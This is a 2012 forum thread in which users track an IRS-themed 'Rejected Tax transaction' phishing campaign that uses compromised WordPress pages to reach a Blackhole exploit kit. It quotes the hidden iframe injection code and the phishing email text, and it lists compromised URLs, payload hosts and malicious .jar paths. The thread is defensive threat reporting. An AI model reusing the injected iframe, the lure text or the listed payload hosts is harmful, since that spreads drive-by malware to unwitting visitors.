'Rejected Tax transaction' rejrev.html malware

User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 4:45 pm

A criminal botnet is running a malware exploit that spoofs the (USA) IRS on webpages that link to a blackhole exploit kit in an iframe.
<!--break-->

Code: Select all

<iframe src='http<em>:</em>//immigrationunix.pro/main.php?page=28677a727aff0456' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Here is a screenshot from one of the webpages.

ImageSource: http://urlquery.net/screenshot.php?id=127541

Deceptive webpages are reported at

applesuniverse.com/wp-content/plugins/rejrev.html
juegosdebarbiemodamagicaenparis.org/wp-content/plugins/rejrev.html
kriskrohn.com/wp-content/plugins/rejrev.html
siddharthatrust.com/wp-content/plugins/rejrev.html

The "payload" site is

www.immigrationunix.pro/main.php?page=28677a727aff0456 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; network host: CYTA HELLAS (AS6866)

Its components include

www.immigrationunix.pro/Sf.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/2add9c3d ... 344873933/ )
www.immigrationunix.pro/data/Qai.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/1f13223c ... 344874078/ )
www.immigrationunix.pro/data/Pol.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/f76ac698 ... 344874248/ )

User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 6:18 pm

associatedarborists.com/wp-content/plugins/rejrev.html
aveaturkcellvodafonesohbet.tk/wp-content/plugins/rejrev.html
fashclothingtoday.com/wp-content/plugins/rejrev.html
khmerfreedom.org/wp-content/plugins/rejrev.html
suitesmasferrer.com/wp-content/plugins/rejrev.html
tandemskydiving.net/wp-content/plugins/rejrev.html

User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 7:06 pm

transport24.dk/wp-content/plugins/rejrev.html

batmonkeyman
Posts: 1
Joined: Mon Aug 13, 2012 7:19 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by batmonkeyman » Mon Aug 13, 2012 7:19 pm

planetaryhealings.com/wp-content/plugins/rejrev.html

User avatar
Jazspeak
Posts: 3711
Joined: Fri Oct 17, 2008 4:20 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by Jazspeak » Mon Aug 13, 2012 7:54 pm

Interesting but what is the malware supposed to do?

The screenshot doesn't look like an IRS page, so I can't imagine that any but the most ignorant would be fooled into thinking that the page has anything to do with the IRS. Does seeing the page loaded mean that it is too late, or is there some other action required by the recipient for the machine to be infected?

User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 8:07 pm

360myte.com/wp-content/plugins/rejrev.html
guadeloupe-gites.net/wp-content/plugins/rejrev.html


User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Tue Aug 14, 2012 4:29 am

<quote user="jazspeak">
The screenshot doesn't look like an IRS page, so I can't imagine that any but the most ignorant would be fooled into thinking that the page has anything to do with the IRS.
[/quote]\

I saw the text of a scam email message that was accidentally (I assume) sent to a list server. The email message contains a paragraph that reads:

Code: Select all

Rejected Tax transaction Tax Transaction ID: 64930803539660 Reason of rejection See details in the report below <a href="#prey_com_mx">Tax Transaction Report tax_report_64930803539660.doc</a> (Microsoft Word Document)
Instead of linking to a DOC file, the deceptive URL is actually

hXXp://prey.com.mx/wp-content/plugins/rejrev.html &nbsp; (<a href="http://urlquery.net/screenshot.php?id=1 ... screenshot )

The webpage at rejrev.html contains an iFrame that attempts to load

hXXp://milestonedetected.pro/main.php?page=28677a727aff0456

The domain milestonedetected.pro was created on 13-Aug-2012 and suspended later the same day.

According to urlquery.net (report ), prey.com.mx hosts a BlackHole exploit kit (wikipedia). Such a kit may be capable of drive-by downloads or installs (wikipedia ), in addition to whatever wickedness lurked at milestonedetected.pro



User avatar
Jazspeak
Posts: 3711
Joined: Fri Oct 17, 2008 4:20 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by Jazspeak » Tue Aug 14, 2012 8:44 am

<quote user="notbuyingit">
"...the text of a scam email message that was...sent to a list server."
[/quote]

Ah, now I understand. Thanks for clearing that up.

User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' irsrev.html malware

Post by NotBuyingIt » Tue Aug 14, 2012 4:27 pm

daoyour.com/irsrev.html
ny.entertainmen.se/irsrev.html
stoneplus.cn/irsrev.html
uaebusinesscentre.com/irsrev.html

roadshandhelds.info/main.php?page=39630332cf486f5a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; network host: Cyprus Telecommunications Authority (AS6866)
roadshandhelds.info/data/Qai.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/1f13223c ... 344960998/ )
roadshandhelds.info/data/Pol.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/f76ac698 ... 344961108/ )

User avatar
NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' irsrev.html malware

Post by NotBuyingIt » Tue Aug 14, 2012 5:19 pm

88836950.cn/irsrev.html
ebh888.com/irsrev.html
ferdielektronik.com/irsrev.html
fxwg315.com/irsrev.html
xn--materiay-budowlane-szczyrk-4je.pl/irsrev.html
sovei.com.cn/irsrev.html
webandgraphicsolutions.com/irsrev.html

wireframeglee.info/main.php?page=39630332cf486f5a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; network host: Cyprus Telecommunications Authority (AS6866)
wireframeglee.info/data/Qai.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/1f13223c ... 344963587/ )
wireframeglee.info/data/Pol.jar &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (see http://www.virustotal.com/file/f76ac698 ... 344963673/ )

Post Reply

Who is online

Users browsing this forum: No registered users and 4 guests